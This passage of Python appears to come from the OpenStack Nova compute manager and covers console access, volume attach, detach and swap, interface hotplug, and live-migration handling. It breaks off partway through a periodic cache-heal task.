self.driver.spawn(context, instance, image_meta,
injected_files=[],
admin_password=None,
network_info=network_info,
block_device_info=block_device_info)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Instance failed to spawn'),
instance=instance)
if image:
instance.image_ref = shelved_image_ref
self._delete_snapshot_of_shelved_instance(context, instance,
image['id'])
self._unshelve_instance_key_restore(instance, scrubbed_keys)
self._update_instance_after_spawn(context, instance)
# Delete system_metadata for a shelved instance
compute_utils.remove_shelved_keys_from_system_metadata(instance)
instance.save(expected_task_state=task_states.SPAWNING)
self._update_scheduler_instance_info(context, instance)
self._notify_about_instance_usage(context, instance, 'unshelve.end')
@messaging.expected_exceptions(NotImplementedError)
@wrap_instance_fault
def reset_network(self, context, instance):
"""Reset networking on the given instance."""
LOG.debug('Reset network', context=context, instance=instance)
self.driver.reset_network(instance)
def _inject_network_info(self, context, instance, network_info):
"""Inject network info for the given instance."""
LOG.debug('Inject network info', context=context, instance=instance)
LOG.debug('network_info to inject: |%s|', network_info,
instance=instance)
self.driver.inject_network_info(instance,
network_info)
@wrap_instance_fault
def inject_network_info(self, context, instance):
"""Inject network info, but don't return the info."""
network_info = self._get_instance_nw_info(context, instance)
self._inject_network_info(context, instance, network_info)
@object_compat
@messaging.expected_exceptions(NotImplementedError,
exception.InstanceNotFound)
@wrap_exception()
@wrap_instance_fault
def get_console_output(self, context, instance, tail_length):
"""Send the console output for the given instance."""
context = context.elevated()
LOG.info(_LI("Get console output"), context=context,
instance=instance)
output = self.driver.get_console_output(context, instance)
if tail_length is not None:
output = self._tail_log(output, tail_length)
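        # The raw console output may contain bytes that are not valid
        # UTF-8/ASCII; 'replace' keeps the returned payload safe to
        # serialize.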
return output.decode('utf-8', 'replace').encode('ascii', 'replace')
def _tail_log(self, log, length):
try:
length = int(length)
except ValueError:
length = 0
if length == 0:
return ''
else:
            return '\n'.join(log.split('\n')[-length:])
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_vnc_console(self, context, console_type, instance):
"""Return connection information for a vnc console."""
context = context.elevated()
LOG.debug("Getting vnc console", instance=instance)
token = str(uuid.uuid4())
if not CONF.vnc_enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'novnc':
# For essex, novncproxy_base_url must include the full path
# including the html file (like http://myhost/vnc_auto.html)
access_url = '%s?token=%s' % (CONF.novncproxy_base_url, token)
if CONF.virtualbox.vrde_require_instance_uuid_as_password:
password = instance.uuid
if CONF.virtualbox.vrde_password_length:
password = password[:CONF.virtualbox.vrde_password_length]
access_url = ("%(base_url)s&password=%(password)s" %
{"base_url": access_url, "password": password})
elif console_type == 'xvpvnc':
access_url = '%s?token=%s' % (CONF.xvpvncproxy_base_url, token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_vnc_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_spice_console(self, context, console_type, instance):
"""Return connection information for a spice console."""
context = context.elevated()
LOG.debug("Getting spice console", instance=instance)
token = str(uuid.uuid4())
if not CONF.spice.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'spice-html5':
# For essex, spicehtml5proxy_base_url must include the full path
# including the html file (like http://myhost/spice_auto.html)
access_url = '%s?token=%s' % (CONF.spice.html5proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_spice_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@object_compat
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_rdp_console(self, context, console_type, instance):
"""Return connection information for a RDP console."""
context = context.elevated()
LOG.debug("Getting RDP console", instance=instance)
token = str(uuid.uuid4())
if not CONF.rdp.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
if console_type == 'rdp-html5':
access_url = '%s?token=%s' % (CONF.rdp.html5_proxy_base_url,
token)
else:
raise exception.ConsoleTypeInvalid(console_type=console_type)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_rdp_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(
exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound,
exception.ConsoleTypeUnavailable,
exception.SocketPortRangeExhaustedException,
exception.ImageSerialPortNumberInvalid,
exception.ImageSerialPortNumberExceedFlavorValue,
NotImplementedError)
@wrap_exception()
@wrap_instance_fault
def get_serial_console(self, context, console_type, instance):
"""Returns connection information for a serial console."""
LOG.debug("Getting serial console", instance=instance)
if not CONF.serial_console.enabled:
raise exception.ConsoleTypeUnavailable(console_type=console_type)
context = context.elevated()
token = str(uuid.uuid4())
access_url = '%s?token=%s' % (CONF.serial_console.base_url, token)
try:
# Retrieve connect info from driver, and then decorate with our
# access info token
console = self.driver.get_serial_console(context, instance)
connect_info = console.get_connection_info(token, access_url)
except exception.InstanceNotFound:
if instance.vm_state != vm_states.BUILDING:
raise
raise exception.InstanceNotReady(instance_id=instance.uuid)
return connect_info
@messaging.expected_exceptions(exception.ConsoleTypeInvalid,
exception.InstanceNotReady,
exception.InstanceNotFound)
@object_compat
@wrap_exception()
@wrap_instance_fault
def validate_console_port(self, ctxt, instance, port, console_type):
if console_type == "spice-html5":
console_info = self.driver.get_spice_console(ctxt, instance)
elif console_type == "rdp-html5":
console_info = self.driver.get_rdp_console(ctxt, instance)
elif console_type == "serial":
console_info = self.driver.get_serial_console(ctxt, instance)
else:
console_info = self.driver.get_vnc_console(ctxt, instance)
return console_info.port == port
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def reserve_block_device_name(self, context, instance, device,
volume_id, disk_bus=None, device_type=None,
return_bdm_object=False):
# NOTE(ndipanov): disk_bus and device_type will be set to None if not
# passed (by older clients) and defaulted by the virt driver. Remove
# default values on the next major RPC version bump.
@utils.synchronized(instance.uuid)
def do_reserve():
bdms = (
objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid))
device_name = compute_utils.get_device_name_for_instance(
context, instance, bdms, device)
# NOTE(vish): create bdm here to avoid race condition
bdm = objects.BlockDeviceMapping(
context=context,
source_type='volume', destination_type='volume',
instance_uuid=instance.uuid,
volume_id=volume_id or 'reserved',
device_name=device_name,
disk_bus=disk_bus, device_type=device_type)
bdm.create()
if return_bdm_object:
return bdm
else:
return device_name
return do_reserve()
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def attach_volume(self, context, volume_id, mountpoint,
instance, bdm=None):
"""Attach a volume to an instance."""
if not bdm:
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
driver_bdm = driver_block_device.convert_volume(bdm)
@utils.synchronized(instance.uuid)
def do_attach_volume(context, instance, driver_bdm):
try:
return self._attach_volume(context, instance, driver_bdm)
except Exception:
with excutils.save_and_reraise_exception():
bdm.destroy()
do_attach_volume(context, instance, driver_bdm)
def _attach_volume(self, context, instance, bdm):
context = context.elevated()
LOG.info(_LI('Attaching volume %(volume_id)s to %(mountpoint)s'),
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
context=context, instance=instance)
try:
bdm.attach(context, instance, self.volume_api, self.driver,
do_check_attach=False, do_driver_attach=True)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE("Failed to attach %(volume_id)s "
"at %(mountpoint)s"),
{'volume_id': bdm.volume_id,
'mountpoint': bdm['mount_device']},
context=context, instance=instance)
self.volume_api.unreserve_volume(context, bdm.volume_id)
info = {'volume_id': bdm.volume_id}
self._notify_about_instance_usage(
context, instance, "volume.attach", extra_usage_info=info)
def _driver_detach_volume(self, context, instance, bdm):
"""Do the actual driver detach using block device mapping."""
mp = bdm.device_name
volume_id = bdm.volume_id
LOG.info(_LI('Detach volume %(volume_id)s from mountpoint %(mp)s'),
{'volume_id': volume_id, 'mp': mp},
context=context, instance=instance)
connection_info = jsonutils.loads(bdm.connection_info)
# NOTE(vish): We currently don't use the serial when disconnecting,
# but added for completeness in case we ever do.
if connection_info and 'serial' not in connection_info:
connection_info['serial'] = volume_id
try:
if not self.driver.instance_exists(instance):
LOG.warning(_LW('Detaching volume from unknown instance'),
context=context, instance=instance)
encryption = encryptors.get_encryption_metadata(
context, self.volume_api, volume_id, connection_info)
self.driver.detach_volume(connection_info,
instance,
mp,
encryption=encryption)
except exception.DiskNotFound as err:
LOG.warning(_LW('Ignoring DiskNotFound exception while detaching '
'volume %(volume_id)s from %(mp)s: %(err)s'),
{'volume_id': volume_id, 'mp': mp, 'err': err},
instance=instance)
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Failed to detach volume %(volume_id)s '
'from %(mp)s'),
{'volume_id': volume_id, 'mp': mp},
context=context, instance=instance)
self.volume_api.roll_detaching(context, volume_id)
def _detach_volume(self, context, volume_id, instance, destroy_bdm=True):
"""Detach a volume from an instance.
:param context: security context
:param volume_id: the volume id
:param instance: the Instance object to detach the volume from
:param destroy_bdm: if True, the corresponding BDM entry will be marked
as deleted. Disabling this is useful for operations
like rebuild, when we don't want to destroy BDM
"""
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
if CONF.volume_usage_poll_interval > 0:
vol_stats = []
mp = bdm.device_name
# Handle bootable volumes which will not contain /dev/
if '/dev/' in mp:
mp = mp[5:]
try:
vol_stats = self.driver.block_stats(instance, mp)
except NotImplementedError:
pass
if vol_stats:
LOG.debug("Updating volume usage cache with totals",
instance=instance)
rd_req, rd_bytes, wr_req, wr_bytes, flush_ops = vol_stats
self.conductor_api.vol_usage_update(context, volume_id,
rd_req, rd_bytes,
wr_req, wr_bytes,
instance,
update_totals=True)
self._driver_detach_volume(context, instance, bdm)
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context, volume_id, connector)
if destroy_bdm:
bdm.destroy()
info = dict(volume_id=volume_id)
self._notify_about_instance_usage(
context, instance, "volume.detach", extra_usage_info=info)
self.volume_api.detach(context.elevated(), volume_id)
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def detach_volume(self, context, volume_id, instance):
"""Detach a volume from an instance."""
self._detach_volume(context, volume_id, instance)
def _init_volume_connection(self, context, new_volume_id,
old_volume_id, connector, instance, bdm):
new_cinfo = self.volume_api.initialize_connection(context,
new_volume_id,
connector)
old_cinfo = jsonutils.loads(bdm['connection_info'])
if old_cinfo and 'serial' not in old_cinfo:
old_cinfo['serial'] = old_volume_id
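# Preserve the original volume's serial in the new connection info
# so the swapped-in volume presents the same serial as the old one.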
new_cinfo['serial'] = old_cinfo['serial']
return (old_cinfo, new_cinfo)
def _swap_volume(self, context, instance, bdm, connector, old_volume_id,
new_volume_id):
mountpoint = bdm['device_name']
failed = False
new_cinfo = None
resize_to = 0
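# resize_to stays 0 (no resize) unless the new volume is larger,
# in which case its size is passed so the driver can grow the
# block device as part of the swap.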
try:
old_cinfo, new_cinfo = self._init_volume_connection(context,
new_volume_id,
old_volume_id,
connector,
instance,
bdm)
old_vol_size = self.volume_api.get(context, old_volume_id)['size']
new_vol_size = self.volume_api.get(context, new_volume_id)['size']
if new_vol_size > old_vol_size:
resize_to = new_vol_size
self.driver.swap_volume(old_cinfo, new_cinfo, instance, mountpoint,
resize_to)
except Exception:
failed = True
with excutils.save_and_reraise_exception():
if new_cinfo:
msg = _LE("Failed to swap volume %(old_volume_id)s "
"for %(new_volume_id)s")
LOG.exception(msg, {'old_volume_id': old_volume_id,
'new_volume_id': new_volume_id},
context=context,
instance=instance)
else:
msg = _LE("Failed to connect to volume %(volume_id)s "
"with volume at %(mountpoint)s")
LOG.exception(msg, {'volume_id': new_volume_id,
'mountpoint': bdm['device_name']},
context=context,
instance=instance)
self.volume_api.roll_detaching(context, old_volume_id)
self.volume_api.unreserve_volume(context, new_volume_id)
finally:
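# On failure, terminate the connection to the new volume that was
# just initialized; on success, the connection to the old volume
# is no longer needed and is terminated instead.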
conn_volume = new_volume_id if failed else old_volume_id
if new_cinfo:
self.volume_api.terminate_connection(context,
conn_volume,
connector)
# If Cinder initiated the swap, it will keep
# the original ID
comp_ret = self.volume_api.migrate_volume_completion(
context,
old_volume_id,
new_volume_id,
error=failed)
return (comp_ret, new_cinfo)
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def swap_volume(self, context, old_volume_id, new_volume_id, instance):
"""Swap volume for an instance."""
context = context.elevated()
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, old_volume_id, instance_uuid=instance.uuid)
connector = self.driver.get_volume_connector(instance)
comp_ret, new_cinfo = self._swap_volume(context, instance,
bdm,
connector,
old_volume_id,
new_volume_id)
save_volume_id = comp_ret['save_volume_id']
# Update bdm
values = {
'connection_info': jsonutils.dumps(new_cinfo),
'delete_on_termination': False,
'source_type': 'volume',
'destination_type': 'volume',
'snapshot_id': None,
'volume_id': save_volume_id,
'volume_size': None,
'no_device': None}
bdm.update(values)
bdm.save()
@wrap_exception()
def remove_volume_connection(self, context, volume_id, instance):
"""Remove a volume connection using the volume api."""
# NOTE(vish): We don't want to actually mark the volume
# detached, or delete the bdm, just remove the
# connection from this host.
# NOTE(PhilDay): Can't use object_compat decorator here as
# instance is not the second parameter
if isinstance(instance, dict):
metas = ['metadata', 'system_metadata']
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance,
expected_attrs=metas)
instance._context = context
try:
bdm = objects.BlockDeviceMapping.get_by_volume_id(
context, volume_id)
self._driver_detach_volume(context, instance, bdm)
connector = self.driver.get_volume_connector(instance)
self.volume_api.terminate_connection(context, volume_id, connector)
except exception.NotFound:
pass
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def attach_interface(self, context, instance, network_id, port_id,
requested_ip):
"""Use hotplug to add an network adapter to an instance."""
network_info = self.network_api.allocate_port_for_instance(
context, instance, port_id, network_id, requested_ip)
if len(network_info) != 1:
LOG.error(_LE('allocate_port_for_instance returned %(ports)s '
'ports'), dict(ports=len(network_info)))
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
image_ref = instance.get('image_ref')
image_meta = compute_utils.get_image_metadata(
context, self.image_api, image_ref, instance)
try:
self.driver.attach_interface(instance, image_meta, network_info[0])
except exception.NovaException as ex:
port_id = network_info[0].get('id')
LOG.warn(_LW("attach interface failed , try to deallocate "
"port %(port_id)s, reason: %(msg)s"),
{'port_id': port_id, 'msg': ex},
instance=instance)
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception:
LOG.warn(_LW("deallocate port %(port_id)s failed"),
{'port_id': port_id}, instance=instance)
raise exception.InterfaceAttachFailed(
instance_uuid=instance.uuid)
return network_info[0]
@object_compat
@wrap_exception()
@reverts_task_state
@wrap_instance_fault
def detach_interface(self, context, instance, port_id):
"""Detach an network adapter from an instance."""
network_info = instance.info_cache.network_info
condemned = None
for vif in network_info:
if vif['id'] == port_id:
condemned = vif
break
if condemned is None:
raise exception.PortNotFound(_("Port %s is not "
"attached") % port_id)
try:
self.driver.detach_interface(instance, condemned)
except exception.NovaException as ex:
LOG.warning(_LW("Detach interface failed, port_id=%(port_id)s,"
" reason: %(msg)s"),
{'port_id': port_id, 'msg': ex}, instance=instance)
raise exception.InterfaceDetachFailed(instance_uuid=instance.uuid)
else:
try:
self.network_api.deallocate_port_for_instance(
context, instance, port_id)
except Exception as ex:
with excutils.save_and_reraise_exception():
# Since this is a cast operation, log the failure for
# triage.
LOG.warning(_LW('Failed to deallocate port %(port_id)s '
'for instance. Error: %(error)s'),
{'port_id': port_id, 'error': ex},
instance=instance)
def _get_compute_info(self, context, host):
return objects.ComputeNode.get_first_node_by_host_for_old_compat(
context, host)
@wrap_exception()
def check_instance_shared_storage(self, ctxt, instance, data):
"""Check if the instance files are shared
:param ctxt: security context
:param instance: dict of instance data
:param data: result of driver.check_instance_shared_storage_local
Returns True if the instance disks are located on shared storage and
False otherwise.
"""
return self.driver.check_instance_shared_storage_remote(ctxt, data)
@wrap_exception()
@wrap_instance_fault
def check_can_live_migrate_destination(self, ctxt, instance,
block_migration, disk_over_commit):
"""Check if it is possible to execute live migration.
This runs checks on the destination host, and then calls
back to the source host to check the results.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
:param disk_over_commit: if true, allow disk over commit
:returns: a dict containing migration info
"""
src_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, instance.host))
dst_compute_info = obj_base.obj_to_primitive(
self._get_compute_info(ctxt, CONF.host))
dest_check_data = self.driver.check_can_live_migrate_destination(ctxt,
instance, src_compute_info, dst_compute_info,
block_migration, disk_over_commit)
migrate_data = {}
try:
migrate_data = self.compute_rpcapi.\
check_can_live_migrate_source(ctxt, instance,
dest_check_data)
finally:
self.driver.check_can_live_migrate_destination_cleanup(ctxt,
dest_check_data)
if 'migrate_data' in dest_check_data:
migrate_data.update(dest_check_data['migrate_data'])
return migrate_data
@wrap_exception()
@wrap_instance_fault
def check_can_live_migrate_source(self, ctxt, instance, dest_check_data):
"""Check if it is possible to execute live migration.
This checks if the live migration can succeed, based on the
results from check_can_live_migrate_destination.
:param ctxt: security context
:param instance: dict of instance data
:param dest_check_data: result of check_can_live_migrate_destination
:returns: a dict containing migration info
"""
is_volume_backed = self.compute_api.is_volume_backed_instance(ctxt,
instance)
dest_check_data['is_volume_backed'] = is_volume_backed
block_device_info = self._get_instance_block_device_info(
ctxt, instance, refresh_conn_info=True)
return self.driver.check_can_live_migrate_source(ctxt, instance,
dest_check_data,
block_device_info)
@object_compat
@wrap_exception()
@wrap_instance_fault
def pre_live_migration(self, context, instance, block_migration, disk,
migrate_data):
"""Preparations for live migration at dest host.
:param context: security context
:param instance: dict of instance data
:param block_migration: if true, prepare for block migration
:param migrate_data: if not None, it is a dict which holds data
required for live migration without shared
storage.
"""
block_device_info = self._get_instance_block_device_info(
context, instance, refresh_conn_info=True)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.start",
network_info=network_info)
pre_live_migration_data = self.driver.pre_live_migration(context,
instance,
block_device_info,
network_info,
disk,
migrate_data)
# NOTE(tr3buchet): setup networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host)
# Create filters for the hypervisor and firewall.
# An example is nova-instance-instance-xxx,
# which is written to libvirt.xml (check "virsh nwfilter-list").
# This nwfilter is necessary on the destination host.
# In addition, this method creates the filtering rules
# on the destination host.
self.driver.ensure_filtering_rules_for_instance(instance,
network_info)
self._notify_about_instance_usage(
context, instance, "live_migration.pre.end",
network_info=network_info)
return pre_live_migration_data
@wrap_exception()
@wrap_instance_fault
def live_migration(self, context, dest, instance, block_migration,
migrate_data):
"""Executing live migration.
:param context: security context
:param instance: a nova.objects.instance.Instance object
:param dest: destination host
:param block_migration: if true, prepare for block migration
:param migrate_data: implementation specific params
"""
# NOTE(danms): since instance is not the first parameter, we can't
# use @object_compat on this method. Since this is the only example,
# we do this manually instead of complicating the decorator
if not isinstance(instance, obj_base.NovaObject):
expected = ['metadata', 'system_metadata',
'security_groups', 'info_cache']
instance = objects.Instance._from_db_object(
context, objects.Instance(), instance,
expected_attrs=expected)
# Create a local copy since we'll be modifying the dictionary
migrate_data = dict(migrate_data or {})
try:
if block_migration:
block_device_info = self._get_instance_block_device_info(
context, instance)
disk = self.driver.get_instance_disk_info(
instance, block_device_info=block_device_info)
else:
disk = None
pre_migration_data = self.compute_rpcapi.pre_live_migration(
context, instance,
block_migration, disk, dest, migrate_data)
migrate_data['pre_live_migration_result'] = pre_migration_data
except Exception:
with excutils.save_and_reraise_exception():
LOG.exception(_LE('Pre live migration failed at %s'),
dest, instance=instance)
self._rollback_live_migration(context, instance, dest,
block_migration, migrate_data)
# Executing live migration
# live_migration might raise exceptions, but
# nothing must be recovered in this version.
self.driver.live_migration(context, instance, dest,
self._post_live_migration,
self._rollback_live_migration,
block_migration, migrate_data)
def _live_migration_cleanup_flags(self, block_migration, migrate_data):
"""Determine whether disks or instance path need to be cleaned up after
live migration (at source on success, at destination on rollback)
Block migration needs an empty image at the destination host before the
migration starts, so if any failure occurs, those empty images have to
be deleted. Volume-backed live migration w/o shared storage also needs
to delete the newly created instance-xxx dir on the destination as part
of its rollback process.
:param block_migration: if true, it was a block migration
:param migrate_data: implementation specific data
:returns: (bool, bool) -- do_cleanup, destroy_disks
"""
# NOTE(angdraug): block migration wouldn't have been allowed if either
# block storage or instance path were shared
is_shared_block_storage = not block_migration
is_shared_instance_path = not block_migration
if migrate_data:
is_shared_block_storage = migrate_data.get(
'is_shared_block_storage', is_shared_block_storage)
is_shared_instance_path = migrate_data.get(
'is_shared_instance_path', is_shared_instance_path)
# No instance is booting at the source host, but the instance dir
# must be deleted to prepare for the next block migration or
# live migration w/o shared storage
do_cleanup = block_migration or not is_shared_instance_path
destroy_disks = not is_shared_block_storage
return (do_cleanup, destroy_disks)
@wrap_exception()
@wrap_instance_fault
def _post_live_migration(self, ctxt, instance,
dest, block_migration=False, migrate_data=None):
"""Post operations for live migration.
This method is called from live_migration
and mainly updates the database record.
:param ctxt: security context
:param instance: instance dict
:param dest: destination host
:param block_migration: if true, prepare for block migration
:param migrate_data: if not None, it is a dict which has data
required for live migration without shared storage
"""
LOG.info(_LI('_post_live_migration() is started...'),
instance=instance)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
ctxt, instance.uuid)
# Cleanup source host post live-migration
block_device_info = self._get_instance_block_device_info(
ctxt, instance, bdms=bdms)
self.driver.post_live_migration(ctxt, instance, block_device_info,
migrate_data)
# Detaching volumes.
connector = self.driver.get_volume_connector(instance)
for bdm in bdms:
# NOTE(vish): We don't want to actually mark the volume
# detached, or delete the bdm, just remove the
# connection from this host.
# remove the volume connection without detaching from hypervisor
# because the instance is not running anymore on the current host
if bdm.is_volume:
self.volume_api.terminate_connection(ctxt, bdm.volume_id,
connector)
# Releasing vlan.
# (not necessary in current implementation?)
network_info = self._get_instance_nw_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.start",
network_info=network_info)
# Releasing security group ingress rule.
self.driver.unfilter_instance(instance,
network_info)
migration = {'source_compute': self.host,
'dest_compute': dest, }
self.network_api.migrate_instance_start(ctxt,
instance,
migration)
destroy_vifs = False
try:
self.driver.post_live_migration_at_source(ctxt, instance,
network_info)
except NotImplementedError as ex:
LOG.debug(ex, instance=instance)
# For all hypervisors other than libvirt, there is a possibility
# they are unplugging networks from source node in the cleanup
# method
destroy_vifs = True
# Define the domain at the destination host; without doing it,
# pause/suspend/terminate do not work.
self.compute_rpcapi.post_live_migration_at_destination(ctxt,
instance, block_migration, dest)
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
block_migration, migrate_data)
if do_cleanup:
self.driver.cleanup(ctxt, instance, network_info,
destroy_disks=destroy_disks,
migrate_data=migrate_data,
destroy_vifs=destroy_vifs)
self.instance_events.clear_events_for_instance(instance)
# NOTE(timello): make sure we update available resources on source
# host even before next periodic task.
self.update_available_resource(ctxt)
self._update_scheduler_instance_info(ctxt, instance)
self._notify_about_instance_usage(ctxt, instance,
"live_migration._post.end",
network_info=network_info)
LOG.info(_LI('Migrating instance to %s finished successfully.'),
dest, instance=instance)
LOG.info(_LI("You may see the error \"libvirt: QEMU error: "
"Domain not found: no domain with matching name.\" "
"This error can be safely ignored."),
instance=instance)
if CONF.vnc_enabled or CONF.spice.enabled or CONF.rdp.enabled:
if CONF.cells.enable:
self.cells_rpcapi.consoleauth_delete_tokens(ctxt,
instance.uuid)
else:
self.consoleauth_rpcapi.delete_tokens_for_instance(ctxt,
instance.uuid)
@object_compat
@wrap_exception()
@wrap_instance_fault
def post_live_migration_at_destination(self, context, instance,
block_migration):
"""Post operations for live migration .
:param context: security context
:param instance: Instance dict
:param block_migration: if true, prepare for block migration
"""
LOG.info(_LI('Post operation of migration started'),
instance=instance)
# NOTE(tr3buchet): setup networks on destination host
# this is called a second time because
# multi_host does not create the bridge in
# plug_vifs
self.network_api.setup_networks_on_host(context, instance,
self.host)
migration = {'source_compute': instance.host,
'dest_compute': self.host, }
self.network_api.migrate_instance_finish(context,
instance,
migration)
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.start",
network_info=network_info)
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.post_live_migration_at_destination(context, instance,
network_info,
block_migration, block_device_info)
# Restore instance state
current_power_state = self._get_power_state(context, instance)
node_name = None
prev_host = instance.host
try:
compute_node = self._get_compute_info(context, self.host)
node_name = compute_node.hypervisor_hostname
except exception.ComputeHostNotFound:
LOG.exception(_LE('Failed to get compute_info for %s'), self.host)
finally:
instance.host = self.host
instance.power_state = current_power_state
instance.task_state = None
instance.node = node_name
instance.save(expected_task_state=task_states.MIGRATING)
# NOTE(tr3buchet): tear down networks on source host
self.network_api.setup_networks_on_host(context, instance,
prev_host, teardown=True)
# NOTE(vish): this is necessary to update dhcp
self.network_api.setup_networks_on_host(context, instance, self.host)
self._notify_about_instance_usage(
context, instance, "live_migration.post.dest.end",
network_info=network_info)
@wrap_exception()
@wrap_instance_fault
def _rollback_live_migration(self, context, instance,
dest, block_migration, migrate_data=None):
"""Recovers Instance/volume state from migrating -> running.
:param context: security context
:param instance: nova.objects.instance.Instance object
:param dest: destination host (this method is called from the
live migration source host)
:param block_migration: if true, prepare for block migration
:param migrate_data:
if not None, contains implementation specific data.
"""
instance.task_state = None
instance.save(expected_task_state=[task_states.MIGRATING])
# NOTE(tr3buchet): setup networks on source host (really it's re-setup)
self.network_api.setup_networks_on_host(context, instance, self.host)
bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(
context, instance.uuid)
for bdm in bdms:
if bdm.is_volume:
self.compute_rpcapi.remove_volume_connection(
context, instance, bdm.volume_id, dest)
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.start")
do_cleanup, destroy_disks = self._live_migration_cleanup_flags(
block_migration, migrate_data)
if do_cleanup:
self.compute_rpcapi.rollback_live_migration_at_destination(
context, instance, dest, destroy_disks=destroy_disks,
migrate_data=migrate_data)
self._notify_about_instance_usage(context, instance,
"live_migration._rollback.end")
@object_compat
@wrap_exception()
@wrap_instance_fault
def rollback_live_migration_at_destination(self, context, instance,
destroy_disks=True,
migrate_data=None):
"""Cleaning up image directory that is created pre_live_migration.
:param context: security context
:param instance: a nova.objects.instance.Instance object sent over rpc
"""
network_info = self._get_instance_nw_info(context, instance)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.start",
network_info=network_info)
# NOTE(tr3buchet): tear down networks on destination host
self.network_api.setup_networks_on_host(context, instance,
self.host, teardown=True)
# NOTE(vish): The mapping is passed in so the driver can disconnect
# from remote volumes if necessary
block_device_info = self._get_instance_block_device_info(context,
instance)
self.driver.rollback_live_migration_at_destination(
context, instance, network_info, block_device_info,
destroy_disks=destroy_disks, migrate_data=migrate_data)
self._notify_about_instance_usage(
context, instance, "live_migration.rollback.dest.end",
network_info=network_info)
@periodic_task.periodic_task(
spacing=CONF.heal_instance_info_cache_interval)
def _heal_instance_info_cache(self, context):
"""Called periodically. On every call, try to update the
info_cache's network information for another instance by
calling to the network manager.
This is implemented by keeping a cache of uuids of instances
that live on this host. On each call, we pop one off of a
list, pull the DB record, and try the call to the network API.
If anything errors, don't fail, as it's possible the instance
has been deleted, etc.
"""
heal_interval = CONF.heal_instance_info_cache_interval
if not heal_interval:
return
instance_uuids = getattr(self, '_instance_uuids_to_heal', [])
instance = None
LOG.debug('Starting heal instance info cache')
if not instance_uuids:
# The list of instances to heal is empty so rebuild it
LOG.debug('Rebuilding the list of instances to heal')
db_instances = objects.InstanceList.get_by_host(
context, self.host, expected_attrs=[], use_slave=True)
for inst in db_instances:
# We don't want to refresh the cache for instances
# which are building or deleting so don't put them
# in the list. If they are building they will get
# added to the list next time we build it.
if (inst.vm_state == vm_states.BUILDING):
LOG.debug('Skipping network cache update for instance '
'because it is Building.', instance=inst)
continue
if (inst.task_state == task_states.DELETING):
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
continue
if not instance:
# Save the first one we find so we don't
# have to get it again
instance = inst
else:
instance_uuids.append(inst['uuid'])
self._instance_uuids_to_heal = instance_uuids
else:
# Find the next valid instance on the list
while instance_uuids:
try:
inst = objects.Instance.get_by_uuid(
context, instance_uuids.pop(0),
expected_attrs=['system_metadata', 'info_cache'],
use_slave=True)
except exception.InstanceNotFound:
# Instance is gone. Try to grab another.
continue
# Check the instance hasn't been migrated
if inst.host != self.host:
LOG.debug('Skipping network cache update for instance '
'because it has been migrated to another '
'host.', instance=inst)
# Check the instance isn't being deleted
elif inst.task_state == task_states.DELETING:
LOG.debug('Skipping network cache update for instance '
'because it is being deleted.', instance=inst)
else:
instance = inst
break
if instance:
